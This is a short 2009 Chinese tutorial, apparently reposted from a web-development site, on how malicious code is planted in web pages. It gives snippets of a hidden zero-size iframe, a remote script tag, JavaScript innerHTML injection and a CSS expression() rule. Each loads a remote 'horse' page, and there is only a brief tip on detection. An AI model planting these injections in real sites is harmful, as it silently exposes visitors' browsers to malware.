了解常用集中网站挂马和防范方法
2009-04-08 13:59:13 来源:WEB开发网1、挂马的N种方法
(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.arthack.org/horse.js></script> ,horse里的js写法一般为 document.write(’http://www.arthack.org/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<inframe src=http://www.zw361.com/horse.htm/”></iframe>”;。不过第2种写法要注意:是原来的网页种要有body标签。
3) 在 css中挂马。
这个方法就是在css中写入
body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=http://www.xxx.com/horse.html/”></iframe>’);
}
然后在主页中调用这个CSS,代码类似http://www.arthack.org/css.css” rel=”stylesheet” type=”text/css”>这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于 javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。
- ››常用诺基亚S60手机软件应用
- ››常用iPhone手机软件应用
- ››了解Windows Mobile文件结构
- ››常用 Java Profiling 工具的分析与比较
- ››常用JS验证函数总结
- ››了解 IBM Smart Business Development and Test o...
- ››常用CentOS vsftpd安装设置讲解
- ››常用的Linux shell命令详解
- ››了解 Apache Click:使用轻量模型快速编写 Web 应...
- ››常用Windows任务管理器进程详解
- ››了解 IBM Data Studio Version 2 软件打包方式
- ››了解微软Office 2010数字签名的新特性
赞助商链接